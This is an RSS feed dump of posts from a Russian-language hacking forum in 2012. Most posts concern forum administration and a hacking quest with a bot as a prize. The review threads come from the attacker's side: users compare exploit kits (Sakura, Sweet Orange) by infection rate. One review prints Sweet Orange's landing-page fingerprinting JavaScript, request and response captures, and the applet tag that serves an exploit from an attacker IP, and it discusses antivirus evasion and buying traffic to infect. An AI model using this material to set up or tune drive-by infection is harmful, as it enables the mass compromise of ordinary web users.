DaMaGeLaB

DaMaGeLaB https://damagelab.org/ DaMaGeLaB ipb2rss ru Sat, 19 May 2012 02:10:29 +0000 DaMaGeLaB https://damagelab.org/ https://damagelab.org/rss_icon.gif 88 31 Обзоры -> Sakura exploit pack https://damagelab.org/index.php?showtopic=22595&view=findpost&p=129866 Gdark:

Цитата:
Я имел ввиду проверку наличия плагинов как таковых. Когда люди сливают трафик с нормальных ресов, их заботит длительное наличие "фрейма" на страницах сайта, однако же если посетителей не имеющих (или отключивших) плагины pdf, java или flash будет напрягать постоянно выскакивающие мессаги о том, что мол де требуется такой то плагин будет явно не айс, а некоторые версии оперы вообще могут редиректить автоматом на страницы для установки этих плагинов без каких либо действий со стороны пользователя. Отсюда и частое снятие фрейма.

специфика выдачи, определяется потребностями пользователей. поэтому если никому он не нужен был, то и незачем его подключать.

Цитата:
Если вы не можете написать нормальное быстрое КРОССБРАУЗЕРНОЕ определение наличия плагинов, это не значит что их определение есть зло в паке и оно снижает пробив. Пробив снижает говнокод!

можем. свое решение уже давно есть и предоставляется нуждающимся)

Цитата:
Выдавать голые сплойты не есть ноухау, но есть хауноу и говорит лишь о нежелании автора разобраться в этом вопросе. Без обид ага )

именно из-за "нежелания автора" связка получала пробив в разы больше других паков =) только потом все поняли или надо убирать плагиндетект(тот который с сайта и палится) или переписывать на более легкий.

А вообще за прошедшие пол года, много воды утекло, связка преобрела совершенно другой вид =)
Так что уже наверное не имеет смысла обсуждать то, чего нет. ]]> Wed, 16 May 2012 18:08:46 +0000 https://damagelab.org/index.php?showtopic=22595 https://damagelab.org/index.php?showtopic=22595&view=findpost&p=129866 О проекте DamageLab -> Изменения на портале https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129809 Ar3s:
Zer0 рега осталась открыта пока что. ]]> Mon, 14 May 2012 10:34:19 +0000 https://damagelab.org/index.php?showtopic=22755 https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129809 О проекте DamageLab -> Изменения на портале https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129770 Zer0:
Хорошо что закрыли но имхо оставь тока логин и контакт для реги

]]> Sat, 12 May 2012 01:17:16 +0000 https://damagelab.org/index.php?showtopic=22755 https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129770 Книги и мануалы -> Поиск литературы https://damagelab.org/index.php?showtopic=8069&view=findpost&p=129765 DruG:
Ищу книжку в электронном виде по Delphi XE2, любого автора.

Если кто найдёт заранее спасибо. ]]> Fri, 11 May 2012 20:26:56 +0000 https://damagelab.org/index.php?showtopic=8069 https://damagelab.org/index.php?showtopic=8069&view=findpost&p=129765 Kонкурсы и квесты -> quest by quake3 https://damagelab.org/index.php?showtopic=22723&view=findpost&p=129747 Quake3:
Ок, квест еще будет открытым какое-то время. ]]> Thu, 10 May 2012 14:28:09 +0000 https://damagelab.org/index.php?showtopic=22723 https://damagelab.org/index.php?showtopic=22723&view=findpost&p=129747 Kонкурсы и квесты -> quest by quake3 https://damagelab.org/index.php?showtopic=22723&view=findpost&p=129745 AKella:
Я вчера до 3 дошел. Может продолжу сегодня, если время свободное будет

]]> Thu, 10 May 2012 12:35:05 +0000 https://damagelab.org/index.php?showtopic=22723 https://damagelab.org/index.php?showtopic=22723&view=findpost&p=129745 Kонкурсы и квесты -> quest by quake3 https://damagelab.org/index.php?showtopic=22723&view=findpost&p=129742 Quake3:
Вот как раз сегодня прошел человек с эксплоита, ViP-K1LLeR. Кстати, весьма грамотный человек, прошел квест весьма быстро и почти без подсказок.

Если еще будет проходить, то в 1 лвл небольшая подсказка - там нужен реферер помимо всего. ]]> Thu, 10 May 2012 11:06:18 +0000 https://damagelab.org/index.php?showtopic=22723 https://damagelab.org/index.php?showtopic=22723&view=findpost&p=129742 Kонкурсы и квесты -> quest by quake3 https://damagelab.org/index.php?showtopic=22723&view=findpost&p=129735 AKella:
Как там, кстати? Кроме Apocalypse кто-то прошел? ]]> Thu, 10 May 2012 00:13:36 +0000 https://damagelab.org/index.php?showtopic=22723 https://damagelab.org/index.php?showtopic=22723&view=findpost&p=129735 О проекте DamageLab -> Нужен ли нам blog.dlab.org.in? https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129706 Ar3s:
Beaten_Sect0r я уже раз 5 пытался его обновить. беда-беда... Бывшие владельцы так намутили с БД, что накатить обновление нереально. Только если ручками сидеть и все перелопачивать. Но делать что-то нужно. Я пока не придумал что именно. ]]> Tue, 08 May 2012 14:19:42 +0000 https://damagelab.org/index.php?showtopic=22786 https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129706 О проекте DamageLab -> Нужен ли нам blog.dlab.org.in? https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129701 Beaten_Sect0r:
имхо не взлетит, как и всё остальное *.damagelab.org, кроме форума и жаббер сервера ни чего не нужно и не плохо бы его обновить или даже перевести на xenforo к примеру, и направить все силы на него. ]]> Tue, 08 May 2012 12:26:29 +0000 https://damagelab.org/index.php?showtopic=22786 https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129701 О проекте DamageLab -> Нужен ли нам blog.dlab.org.in? https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129700 паук:
Можно наверное прикрутить форум к блогу и вновь созданные "ТЕМЫ по ТЕМЕ" одним кликом переносить в блог при создании темы. Кто то не хочет курить кучу топиков форума с обсуждениями срачами и т.п. но будет с удовольствием читать блог с вижимкой только интересных тем. ]]> Tue, 08 May 2012 11:09:53 +0000 https://damagelab.org/index.php?showtopic=22786 https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129700 О проекте DamageLab -> Нужен ли нам blog.dlab.org.in? https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129697 waahoo:
бложек это хорошо, и пусть сейчас лично у меня нет времени на это, в будущем оно появится и было бы здорово сделать и свой вклад в "библиотеку", хотя с другой стороны форум может прекрасно выполнить эту функцию. так что я даже хз, бложики в теории могут заменить форум, это тот же хуй только в другой руке, так сказать на новый лад, но почему-то мне форум ближе, а кому-то может и наоборот и если этих кого-то будет достаточное множество блоги можно оставить. ]]> Tue, 08 May 2012 08:33:44 +0000 https://damagelab.org/index.php?showtopic=22786 https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129697 О проекте DamageLab -> Нужен ли нам blog.dlab.org.in? https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129694 12309:
на бложек не хватает ссылки в верху форума. ]]> Tue, 08 May 2012 00:28:31 +0000 https://damagelab.org/index.php?showtopic=22786 https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129694 О проекте DamageLab -> Нужен ли нам blog.dlab.org.in? https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129692 datel:
тоже впервые слышу ]]> Tue, 08 May 2012 00:23:01 +0000 https://damagelab.org/index.php?showtopic=22786 https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129692 О проекте DamageLab -> Нужен ли нам blog.dlab.org.in? https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129687 ammok:
блогспота мало чтоль? авторитетных авторов на ресурсе мало, да и те что есть давно уже не частые гости... не вижу смысла

http://amatrosov.blogspot.com уверен аналогичных блогов не будет, да и думаю на форуме все сказать можно...

p.s. дл уже на памятник похож, на мой взгляд не стоит его осквернять левыми службами, а то солянка получается ]]> Mon, 07 May 2012 19:19:55 +0000 https://damagelab.org/index.php?showtopic=22786 https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129687 О проекте DamageLab -> Нужен ли нам blog.dlab.org.in? https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129685 12309:
"утром я ел пельмешки, а вечером ходил в кино", ага

]]> Mon, 07 May 2012 18:10:10 +0000 https://damagelab.org/index.php?showtopic=22786 https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129685 О проекте DamageLab -> Нужен ли нам blog.dlab.org.in? https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129681 Barack:
я думаю норм идея , я только за. Иногда хочется что-то написать небольшое , не дотягивающее до темы на форуме.
Главное чтобы блоги у народа были хотя бы близко к хак тематики и не превращались в отписывание сколько было куплено/выпито пива, когда в гастроном подвезли новую кегу "жигулей" и т.д. , т.е. чтобы минимум 50% постов было по тематике

]]> Mon, 07 May 2012 15:18:24 +0000 https://damagelab.org/index.php?showtopic=22786 https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129681 О проекте DamageLab -> Нужен ли нам blog.dlab.org.in? https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129680 Ar3s:
паук нет это тот же сервак что и для конфы. Просто думаю доводить его до ума или нет. ]]> Mon, 07 May 2012 15:06:14 +0000 https://damagelab.org/index.php?showtopic=22786 https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129680 О проекте DamageLab -> Нужен ли нам blog.dlab.org.in? https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129679 паук:
Если он есть не просит, то пусть будет. Я например о нем слышу впервые.
Если это отдельно оплачиваемый сервер купленный только ради блога - мочи его, форума достаточно. ]]> Mon, 07 May 2012 15:04:39 +0000 https://damagelab.org/index.php?showtopic=22786 https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129679 О проекте DamageLab -> Нужен ли нам blog.dlab.org.in? https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129678 Ar3s:
Нужен ли нам этот блог и видите ли вы в нем смысл?
Помимо голоса еще хотелось бы услышать какие-нить мысли в слух.

p.s. cms устанавливалась с целью создать аналог хабра но хак/кодерской тематики.
Для чистоты опроса проголосовал нейтрально, т.к. то что ты сам делал крайне жалко уничтожать. ]]> Mon, 07 May 2012 14:29:00 +0000 https://damagelab.org/index.php?showtopic=22786 https://damagelab.org/index.php?showtopic=22786&view=findpost&p=129678 Обзоры -> Sakura exploit pack https://damagelab.org/index.php?showtopic=22595&view=findpost&p=129607 TrueUser:
Может с запозданием но я поясню свой коммент.

Под плагиндетектом я НЕ подразумевал говноскрипт плагиндетекта который все кому не лень тыкают в выдачу и который палится всеми кому не лень (качается и так сказать "собирается" на каком то онлайн сервисе). Я имел ввиду проверку наличия плагинов как таковых. Когда люди сливают трафик с нормальных ресов, их заботит длительное наличие "фрейма" на страницах сайта, однако же если посетителей не имеющих (или отключивших) плагины pdf, java или flash будет напрягать постоянно выскакивающие мессаги о том, что мол де требуется такой то плагин будет явно не айс, а некоторые версии оперы вообще могут редиректить автоматом на страницы для установки этих плагинов без каких либо действий со стороны пользователя. Отсюда и частое снятие фрейма.

Если вы не можете написать нормальное быстрое КРОССБРАУЗЕРНОЕ определение наличия плагинов, это не значит что их определение есть зло в паке и оно снижает пробив. Пробив снижает говнокод!

Не надо тыкать в меня "написал бы сам", о моей компетенции в этом вопросе можно спросить у людей в компетенции которых, я надеюсь, вы не сомневаетесь.
Выдавать голые сплойты не есть ноухау, но есть хауноу и говорит лишь о нежелании автора разобраться в этом вопросе. Без обид ага )

Добавлено в May 3 2012, 18:01
"А чтобы не выдавалось тем у кого плагин не установлен можно проверять
navigator.JavaEnabled..."

Как известно сия фича не отражает реального состояния дел во многих браузерах, так что не отделаетесь ей так просто, а вот пробив уменьшить - это запросто. ]]> Thu, 03 May 2012 18:01:29 +0000 https://damagelab.org/index.php?showtopic=22595 https://damagelab.org/index.php?showtopic=22595&view=findpost&p=129607 О проекте DamageLab -> Изменения на портале https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129602 TrueUser:
Можно зарегать в яндексе для вм дл и попросить снять пометку. ]]> Thu, 03 May 2012 14:29:23 +0000 https://damagelab.org/index.php?showtopic=22755 https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129602 О проекте DamageLab -> Изменения на портале https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129544 demien:
возможно их "рейтинг" опасности сайтов автоматически ранг выставил... ]]> Sat, 28 Apr 2012 22:29:32 +0000 https://damagelab.org/index.php?showtopic=22755 https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129544 О проекте DamageLab -> Изменения на портале https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129526 Ar3s:
Я думаю что они определили форум как хакерский и именно всвязи с этим выдается предупреждение. От контента на главной или наших топов это, по-моему, не зависит. ]]> Sat, 28 Apr 2012 13:59:22 +0000 https://damagelab.org/index.php?showtopic=22755 https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129526 О проекте DamageLab -> Изменения на портале https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129521 Quake3:
Для пользователя №13461
как я помню, это давно уже есть. Еще с 2010 года где-то, я тогда Винуксу писал на эту тему. Мб поисковик тупой и видит какой-то контент, типа сорцев чего-то там. Это как авер, который на странице, где выложен исходный код малвари, пишет детект этой самой малвары. ]]> Fri, 27 Apr 2012 20:39:25 +0000 https://damagelab.org/index.php?showtopic=22755 https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129521 О проекте DamageLab -> Изменения на портале https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129518 DeusEx:
в выдаче яндекса дл помечается как сайт который может нанести всед вашему компьютеру. с этим можно чтото сделать ? в яндекс написать например или криптануть. ]]> Fri, 27 Apr 2012 19:39:16 +0000 https://damagelab.org/index.php?showtopic=22755 https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129518 О проекте DamageLab -> Изменения на портале https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129512 12309:
охуенно, спасибо! ]]> Fri, 27 Apr 2012 12:05:46 +0000 https://damagelab.org/index.php?showtopic=22755 https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129512 О проекте DamageLab -> Jabber конференция https://damagelab.org/index.php?showtopic=21861&view=findpost&p=129511 Ar3s:
Хостер упал. Конфа временно недоступна.

/alert.gif>Реплика модератора

[Ar3s:] UP. Все работает в штатном режиме.

]]> Fri, 27 Apr 2012 10:50:00 +0000 https://damagelab.org/index.php?showtopic=21861 https://damagelab.org/index.php?showtopic=21861&view=findpost&p=129511 О проекте DamageLab -> Изменения на портале https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129510 DASM32:
Для пользователя №33
А, вот оно что, значит я действительно не вполне верно понял "закрыть", я полагал, что закрыто будет всё

]]> Fri, 27 Apr 2012 08:52:46 +0000 https://damagelab.org/index.php?showtopic=22755 https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129510 О проекте DamageLab -> Изменения на портале https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129509 Ar3s:
под учеткой:
1.1
1.2

под гостем или поисковиком:
2.1
2.2 ]]> Fri, 27 Apr 2012 08:32:27 +0000 https://damagelab.org/index.php?showtopic=22755 https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129509 О проекте DamageLab -> Изменения на портале https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129501 DASM32:
Для пользователя №33
Дак заходил, даже через проксю залезал - по-старому, топы видны. Или только определенные разделы закрыты? Или "закрытие" в чем-то другом?

]]> Thu, 26 Apr 2012 21:17:33 +0000 https://damagelab.org/index.php?showtopic=22755 https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129501 О проекте DamageLab -> Изменения на портале https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129497 Ar3s:
DASM32

Цитата:
Всем зарегистрированным пользователям это не принесет никаких неудобств.

Войди под гостем что бы увидеть разницу. ]]> Thu, 26 Apr 2012 19:29:05 +0000 https://damagelab.org/index.php?showtopic=22755 https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129497 О проекте DamageLab -> Изменения на портале https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129495 Gdark:
давно пора ]]> Thu, 26 Apr 2012 18:17:26 +0000 https://damagelab.org/index.php?showtopic=22755 https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129495 О проекте DamageLab -> Изменения на портале https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129494 DASM32:

Цитата:
на время закрыть дамагу для просмотра гостям

Хм, а "закрытие" еще не действует? ]]> Thu, 26 Apr 2012 15:44:25 +0000 https://damagelab.org/index.php?showtopic=22755 https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129494 О проекте DamageLab -> Изменения на портале https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129493 demien:
хм... закрыли vx.netlux.org
теперь на дамагу покушаются... не хорошо... ( ]]> Thu, 26 Apr 2012 15:32:52 +0000 https://damagelab.org/index.php?showtopic=22755 https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129493 О проекте DamageLab -> Изменения на портале https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129491 Ar3s:

В связи с повышенным интересом различных АВ и etc контор к порталу, было принято решение на время закрыть дамагу для просмотра гостям и поисковикам. Всем зарегистрированным пользователям это не принесет никаких неудобств. ]]> Thu, 26 Apr 2012 14:50:20 +0000 https://damagelab.org/index.php?showtopic=22755 https://damagelab.org/index.php?showtopic=22755&view=findpost&p=129491 Kонкурсы и квесты -> quest by quake3 https://damagelab.org/index.php?showtopic=22723&view=findpost&p=129275 Quake3:
Приглашаю принять участие в новом квесте. Суть конкурса - пошаговый квест, цель - успешно пройти все задания. Тематика заданий в основном хак, работа с веб-протоколами, немного реверса, немного криптографии.

Касаемо призов - призовыми будут первые три места. Пока что призы:
- Andromeda bot, версия 01 (подробнее - см. тему http://exploit.in/forum/index.php?showtopic=52570 )
- Услуги от Cavalliere http://exploit.in/forum/index.php?showuser=34222 , конкретно 1000р на услуги его сервиса + 3 акки ДНС хоста, на 100 500 и 1000 доменов (и может что-то еще).
- Денежный приз от администрации форума Exploit.in.

Обсуждение квеста здесь:
http://exploit.in/forum/index.php?showtopic=58000

Первый уровень квеста здесь http://rootkits.su/eq/lvl1.php
Желаю всем удачи). ]]> Wed, 11 Apr 2012 22:50:28 +0000 https://damagelab.org/index.php?showtopic=22723 https://damagelab.org/index.php?showtopic=22723&view=findpost&p=129275 Обзоры -> Связка Sweet Orange - впечатления https://damagelab.org/index.php?showtopic=22705&view=findpost&p=129217 Mr._Zed:
Респект Aels, спасибо, заценил его еще на экспе, но здесь в обзорах ему самое место

]]> Thu, 05 Apr 2012 15:08:08 +0000 https://damagelab.org/index.php?showtopic=22705 https://damagelab.org/index.php?showtopic=22705&view=findpost&p=129217 Обзоры -> Связка Sweet Orange - впечатления https://damagelab.org/index.php?showtopic=22705&view=findpost&p=129214 Aels:
Для пользователя №10434
мне достался только пдф, который позже (аж через 2 недели) начал детектится как либтифф.
остальное снять неуспел=\
Судя по пробиву, там рино, либтифф, и мдак (куда ж без него)
В любом случае связка себя палит на фф и хроме, требуя акробат. ]]> Thu, 05 Apr 2012 13:22:35 +0000 https://damagelab.org/index.php?showtopic=22705 https://damagelab.org/index.php?showtopic=22705&view=findpost&p=129214 Обзоры -> Связка Sweet Orange - впечатления https://damagelab.org/index.php?showtopic=22705&view=findpost&p=129210 GOONER:
Хотелось бы посмотреть на сплоиты, если ты их поснимал

]]> Thu, 05 Apr 2012 12:24:18 +0000 https://damagelab.org/index.php?showtopic=22705 https://damagelab.org/index.php?showtopic=22705&view=findpost&p=129210 Обзоры -> Связка Sweet Orange - впечатления https://damagelab.org/index.php?showtopic=22705&view=findpost&p=129208 greenzy:
Для пользователя №61005 спасибо!
у кого нибудь есть статистика пробива паков на сегодняшний день? в связи сюрпризом огнелиса

]]> Thu, 05 Apr 2012 11:59:17 +0000 https://damagelab.org/index.php?showtopic=22705 https://damagelab.org/index.php?showtopic=22705&view=findpost&p=129208 Обзоры -> Связка Sweet Orange - впечатления https://damagelab.org/index.php?showtopic=22705&view=findpost&p=129206 Ar3s:

/alert.gif>Реплика модератора

[Ar3s:] Обзорчик размещен автором по моей личной просьбе.
За что огромное спасибо.

]]> Thu, 05 Apr 2012 11:04:20 +0000 https://damagelab.org/index.php?showtopic=22705 https://damagelab.org/index.php?showtopic=22705&view=findpost&p=129206 Обзоры -> Связка Sweet Orange - впечатления https://damagelab.org/index.php?showtopic=22705&view=findpost&p=129202 Aels:
Итак, небольшой обзор от меня.

С начала люто удивился подходу автора к связке как таковой, и отнесся с недоверием.
Постучал за тестом, на что после нескольких моих косяков с криптом, мне любезно выдали сначала ip,
приняли от меня ехе, предоставили линк для просмотра гостевой статистики, и линк для слива трафа.
Автор ни в какую не хотел рассказывать про состав сплойтов, сказал лишь, что сервер действительно под винду.

IP немецкий. Приятно. Скорости: 12мб по ДЕ, и 1мб за Германию. (все это условно - что спидтестеры напоказывали)

Цитата:
Данные ответа
HTTP/1.1 200 OK
Date: Sat, 25 Feb 2012 00:57:34 GMT
Server: Apache/2.2.22 (Win32) PHP/5.3.10
X-Powered-By: PHP/5.3.10

Как есть винда, не обманули) на мордашке заботливо висит апач.

Сама выдача связки перевешена с 80го порта на 8181 (что весьма полезно против шлака, который скитается по сети на автопилоте, и забивает статистику)
Линк вида http://176.64.133.68:8181/hGY?hiGY=15
Причем все что после порта можно менять как угодно - выдачу это не меняет (но определенно влияет на учет трафа в админке)
Итак.

Код:
GET /hITGY?hiGY=14 HTTP/1.1
Host: 121.45.134.19:8181
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Accept: text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers

На гугл-бота в ЮА выдается 404.

Код:
HTTP/1.1 200 OK
Date: Thu, 11 Aug 2011 18:39:27 GMT
Server: Apache/2.2.19 (Win32) PHP/5.3.6
Set-Cookie: adcDq=b05d51a8-7872-4001-ab7f-663fa4c5a7cc
Content-Length: 4516
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html

Кука не зависит от агента, и видимо привязана к ip.
Тело ответа:

Скрытый текст требует сообщений 3 у вас 1

Код:
<html>
<head>
<noscript>
<meta http-equiv="refresh" content="0; url=lCben?CfLob=2412718735&hjMeL">
</noscript>
</head>
<body>
<script language="javascript">

function base64encode(str) {

var base64EncodeChars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
var out, i, len;
var c1, c2, c3;

len = str.length;
i = 0;
out = '';

while(i < len) {

c1 = str.charCodeAt(i++) & 0xff;
if(i == len) {
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt((c1 & 0x3) << 4);
out += '==';
break;
}

c2 = str.charCodeAt(i++);
if(i == len) {
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt(((c1 & 0x3)<< 4) | ((c2 & 0xF0) >> 4));
out += base64EncodeChars.charAt((c2 & 0xF) << 2);
out += '=';
break;
}

c3 = str.charCodeAt(i++);
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt(((c1 & 0x3)<< 4) | ((c2 & 0xF0) >> 4));
out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >>6));
out += base64EncodeChars.charAt(c3 & 0x3F);

}

return out;

}

function GetOs() {

$os = "";
$useragent = navigator.userAgent;

if ($useragent.indexOf("Windows 95") != -1) $os = "95";
else if ($useragent.indexOf("Windows NT 4") != -1) $os = "NT4";
else if ($useragent.indexOf("Windows 98") != -1) $os = "98";
else if ($useragent.indexOf("Win 9x 4.9") != -1) $os = "ME";
else if ($useragent.indexOf("Windows NT 5.0") != -1) $os = "2000";
else if ($useragent.indexOf("Windows NT 5.1") != -1) $os = "XP";
else if ($useragent.indexOf("Windows NT 5.2") != -1) $os = "2003";
else if ($useragent.indexOf("Windows NT 6.0") != -1) $os = "Vista";
else if ($useragent.indexOf("Windows NT 6.1") != -1) $os = "Seven";
else if ($useragent.indexOf("Linux") != -1) $os = "Linux";
else if ($useragent.indexOf("Mac OS") != -1) $os = "MacOS";
else $os = "Other";

return $os;

}

function DetectBrowser() {

var browser = [];

useragent = navigator.userAgent;

if (res = /opera\s?\/?(\d+).(\d+)/i.exec(useragent)) {
browser[0] = "Opera";
browser[1] = res[1];
browser[2] = res[2];
res = /Version\s?\/?(\d+).(\d+)/i.exec(useragent);
if (res) {
browser[1] = res[1];
browser[2] = res[2];
}
}
else if (res = /msie\s(\d+).(\d+)/i.exec(useragent)) {
browser[0] = "ie";
browser[1] = res[1];
browser[2] = res[2];
}
else if (res = /firefox\/(\d+).(\d+)/i.exec(useragent)) {
browser[0] = "Firefox";
browser[1] = res[1];
browser[2] = res[2];
}
else if (res = /Chrome\/?\s?(\d+)\.(\d+)/i.exec(useragent)) {
browser[0] = "Chrome";
browser[1] = res[1];
browser[2] = res[2];
}
else if (res = /Safari\/(\d+)\.(\d+)/i.exec(useragent)) {
browser[0] = "Safari";
browser[1] = res[1];
browser[2] = res[2];
res = /Version\/?(\d+).(\d+)/i.exec(useragent);
if (res) {
browser[1] = res[1];
browser[2] = res[2];
}
} else {
browser[0] = "Other";
browser[1] = "0";
browser[2] = "0";
}

return browser;

}

function CheckSoft() {

var PlugName = "";

try {

if( navigator.plugins && navigator.mimeTypes.length) {

for( var i = 0; i < navigator.plugins.length; i++) {
PlugVersion = /\d+\.\d+/.exec(navigator.plugins[i].description);
if (!PlugVersion) {
PlugVersion = ""; // ?
}
jf = navigator.plugins[i].name.match(/Java[^\d]+(\d) U(\d+)/);
if (jf) {
PlugName = PlugName + navigator.plugins[i].name + " [" + jf[1] + "." + jf[2] + "]|";
} else {
PlugName = PlugName + navigator.plugins[i].name + " [" + PlugVersion + "]|";
}
}
}
}
catch(e) {}

return PlugName;
}

Browser = DetectBrowser();
os = base64encode(GetOs());
BrowserName = base64encode(Browser[0]);
BrowserVer = base64encode(Browser[1] + "." + Browser[2]);
Plugins = base64encode(CheckSoft());

location.replace("lCben?CfLob=2412718735&GmzjZ=" + Plugins + "&N4Riz=" + os + "&7cIf9=" + BrowserName + "&OFCPk=" + BrowserVer);

</script>
</body>
</html>

Если js отключен, то вылетаем на 404. Хорошо) Ибо параноики всеравно пропатченые.
Ботам оно правда пофигу. Все давно js хавают.

Код никак не обфусцирован. Глаз веб-мастеру не режет. И в блеки ав попадать не будет, т.к все (или почти все) функи есть в паблике.
Тоесть страница с детектами вообще заразы не содержит.

base64encode(str) - делает то что положено.
GetOs() - аналогично
DetectBrowser() - правильные проверки для оперы и хрома.
CheckSoft() - собираем все плагины, и отдельно чекаем яву (ибо JavaEnabled() глючит от браузера к браузеру).

Собираем все это в урл, и летим на него.
*летать можно сколько угодно раз. Линк для юзера не умирает. Он спокойно получит сплойты и второй и десятый раз.

Код:
http://beat**.in:8181/lC****?C**Lob=2****35&GmzjZ=U2h***sYXNoIFsxMS4xXXxHb29nbGUgVXBkYXRlIFtdfA==&N4Riz=U2V2ZW4=&7cIf9=T3BlcmE=&OFCPk=MTEuNjE=

Выдача:

Код:
<html><head></head>
<body>
<applet archive="20" code="RH1.R0H1.class" width="1" height="1"><param name="url" value="http://123.65.235.55:8181/XGCMi?expid=10&fid=21"></applet>
</body>
</html>

Получаем пдф, сейвим.
Всего 8.3Кб
Оставлю его на разбор людям шарящим.
Забавная картина в хроме:

в фф аналогично.
Зачем собирать плагины, и при явном отсутствии пдф-вьюера отдавать пдф... Это огорчило. Придется вешать свои проверки.

Структура директорий никак не рандомизируется. Нашлось кажется все:

И инсталлер:

В инсталлере затисалась копипаста. Все инпуты гордо несли id="input1".
Можно даже сделать вот так:

Опустим пока этот момент (из этических соображений, ибо потрошить-то никто не просил).
Идем дальше:

Так же нашелся phpmyadmin. (заинстален сюда C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\phpmyadmin\ )

Вход в гостевую стату - по ключу в урле (md5 от чего-то). Многоразовый.
Внутри аскетично - пришло, пробито и процент.

Полную стату мне не дали (раз не дали, значит скрины показывать не стоит))

Когда дело дошло до слива трафа, я честно признался, что врятли стану их клиентом. И слить мне ничего не дали, пожелав удачи
Так что, увы, пробив потестить не удалось.

Впечатление осталось позитивное, но смутноватое...
Автор адекватен бесспорно, но жутко секретничает. Несколько раз акцентировал работу "на качество" а не "на количество".
Дизайн админки - чисто "для галочки". Изысков немного. Стата скуповата, но явно лучше феникса например).
Пробив по заявлениям автора - 15% (несмотря на то, что как я ни волохался, ничего кроме пдф-ки снять не смог - она выдавалась мне всегда и на все). Надо полагать, что я плох в снятии сплойтов, и ява там хорошо спрятана (без иронии).

Быстродействие связки:
Вся выдача умещается в 15кб. Время загрузки в среднем 0.2-0.4 сек (на пустом сервере) Под нагрузкой потестить возможности не было.
Про внутреннее устройство рассказывать не стали, обмолвившись лишь об очень быстром бэкэнде.

Палевность для ав - минимальна, т.к. статика всегда чистая (ибо белая))
Все что представляется в UA не пятеркой браузеров - получает 404.

Цитата:
Защита от автоматического скачивания эксплоитов ав.

Тут "приукрасили" явно. Js все давно выполняют. Но закрыв выдачу пачкой проверок, сильно облегчили себе чистки) Т.к. доходить будет меньше юзеров с заинсталенными ав.

Жаль что обзор получился без самого вкусного. Пробив, быстродействие, и время жизни в чистоте - оставлю возможность потестить будущим клиентам.

Внутреннее устройство освещать не буду, ибо меня вовремя стерли с сервера XD

Косяк с открытым инсталлером я думаю быстро пофиксят.

скриншот с пробивом от автора:

15% на фф. что вобщем, ныне хуже, чем в среднем по рынку. (видимо еще не добавили последний явасплойт) ]]> Wed, 04 Apr 2012 21:34:00 +0000 https://damagelab.org/index.php?showtopic=22705 https://damagelab.org/index.php?showtopic=22705&view=findpost&p=129202 Обзоры -> Мой опыт создания ботнета https://damagelab.org/index.php?showtopic=22273&view=findpost&p=129052 Quake3:
